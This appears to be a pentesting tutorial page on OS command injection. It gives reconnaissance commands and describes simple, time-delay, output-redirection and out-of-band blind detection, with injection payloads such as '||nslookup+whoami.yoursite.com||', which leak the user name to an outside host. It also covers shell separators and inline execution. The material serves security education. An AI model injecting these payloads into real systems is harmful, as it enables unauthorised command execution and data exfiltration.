> For the complete documentation index, see [llms.txt](https://0xa1mn.gitbook.io/cyber-explained/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xa1mn.gitbook.io/cyber-explained/pentesting/web-pentesting/os-command-injection.md).

# OS command injection

**Useful commands**

| Purpose of command    | Linux         | Windows         |
| --------------------- | ------------- | --------------- |
| Name of current user  | `whoami`      | `whoami`        |
| Operating system      | `uname -a`    | `ver`           |
| Network configuration | `ifconfig`    | `ipconfig /all` |
| Network connections   | `netstat -an` | `netstat -an`   |
| Running processes     | `ps -ef`      | `tasklist`      |

**How to Test this Vulnerability**

* **Simple case**

  try to add `|whoami` to the end of parameters go to DB and observe the response

  *this case work when website append no defense against this type of attacks*
* **Blind OS command injection vulnerabilities**

  he application does not return the output from the command within its HTTP response.

  Consider a web site that lets users **submit feedback** about the site.

  **How to detect :**

  * **Detecting blind OS command injection using time delays**

    add `||ping -c 10 127.0.0.1||` if delay executed this parameter vulnerable
  * **Exploiting blind OS command injection by redirecting output**

    add `||whoami > /var/www/static/whoami.txt||` then search for function which retrieve data from this folder alter the request to `whoami.txt`
  * **Exploiting blind OS command injection using out-of-band (OAST) techniques**

    add `|| nslookup yoursite.com ||` then check your logs or use burp collab URL

    add *||nslookup+whoami.yoursite.com||* then check your logs or use burp collab URL

**Ways of injecting OS commands**

A variety of shell metacharacters can be used to perform OS command injection attacks.

A number of characters function as command separators, allowing commands to be chained together. The following command separators work on both Windows and Unix-based systems:

* &
* &&
* |
* ||

The following command separators work only on Unix-based systems:

* ;
* Newline (0x0a or \n)

On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:

```
`injected command `$( injected command )
```

Note :

that the different shell metacharacters have subtly different behaviors that might affect whether they work in certain situations, and whether they allow in-band retrieval of command output or are useful only for blind exploitation.

*Sometimes, the input that you control appears within quotation marks in the original command. In this situation, you need to terminate the quoted context (using " or ') before using suitable shell metacharacters to inject a new command.*

<br>
